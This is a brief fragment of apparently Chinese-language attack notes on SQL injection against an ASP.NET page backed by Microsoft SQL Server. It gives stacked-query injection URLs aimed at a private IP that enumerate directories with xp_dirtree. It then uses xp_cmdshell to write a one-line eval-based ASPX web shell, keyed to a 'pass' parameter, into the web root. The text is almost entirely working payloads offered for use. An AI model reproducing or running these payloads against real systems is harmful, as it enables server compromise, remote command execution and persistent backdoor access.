http://192.168.130.137/1.aspx?id=1;
CREATE TABLE tmp (dir varchar(8000),num int,num1 int);
http://192.168.130.137/1.aspx?id=1;
insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1
xp_cmdshell 拿 shell
虽然是备份拿shell顺便提下,我们找到目录了权限能调用xp_cmdshell来写那样就很轻松了也就不需要备份了。
http://192.168.130.137/1.aspx?id=1;
exec master..xp_cmdshell
'echo ^<%@ Page Language="J"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:WWW404.aspx' ;